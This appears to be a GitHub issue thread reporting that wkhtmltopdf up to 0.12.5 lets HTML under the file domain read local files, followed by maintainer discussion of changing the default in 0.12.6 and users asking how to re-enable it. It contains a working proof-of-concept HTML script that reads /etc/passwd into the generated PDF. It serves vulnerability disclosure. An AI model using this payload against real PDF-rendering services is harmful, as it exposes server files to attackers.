The same origin policy allows local files to be read by default

[1135]

wkhtmltopdf version(s) affected:
all version ( <=0.12.5 )

OS information
All supported OS

Description
Because the same-origin policy is not strict enough, the html files under the file domain can read any files.

How to reproduce

Create an HTML file named 111.html
The file contents are as follows.

<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<body>

<script>
x=new XMLHttpRequest;
x.onload=function(){
document.write(this.responseText)
};
x.open("GET","file:///etc/passwd");
x.send();
</script>

</body></html>

Convert HTML to PDF:

wkhtmltopdf  /tmp/111.html  /tmp/result.pdf

Expected behavior
View the file named result.pdf contents, you will see the contents of the file /etc/passwd!

Possible Solution
Make a strict same-origin policy or set a security option, to prevent HTML documents under the file domain from reading any files.

[ashkulz]

Hmm, does that work with --disable-local-file-access? I think the opposite is the default for backward compatibility reasons, but not sure if it should be made the default now.

[1135]

Great.-n --disable-local-file-access effectively prevents local file reading.
That is to say, the local file read will succeed only if this option is not used(default).
I understand it.You have the final say~

[ashkulz]

I'm thinking that it's better to switch the default, as you weren't aware of it and you were reporting what you thought was a vulnerability! Discoverability seems to be low, and if it breaks for someone they can easily fix it. I'd appreciate a PR changing the default 👍

[1135]

wkhtmltopdf is practical and used widely.
I found that someone had built a web service, and called wkhtmltopdf on the back end without considering security. As a result, it is not difficult for hackers to get information of the server remotely. so I reported the risk of this default configuration.
As you said, the PR will make it better~

[ashkulz]

Great, will wait for one from you then!

[ashkulz]

A release candidate for the 0.12.6 release is now available for download, which should contain changes which possibly address this issue.

Would appreciate downloading the package and reporting back if any issues are encountered during testing. Assuming all goes well, I plan to release 0.12.6 on the 2-year anniversary of the previous release i.e. June 11, 2020.

[pedrofurtado]

How to revert, using 0.12.6, to previous behavior? Is there some flag?

[ashkulz]

You can always use --enable-local-file-access.

[iturbe]

The latest update broke my program in which i'm using the following line within a python file:

imgkit.from_file('output/htmls/' + str(idx) + '.html', jpeg_output_path + str(number) + '_out.jpg')

How/where should i add in the --enable-local-file-access for it to work again?

Thanks in advance!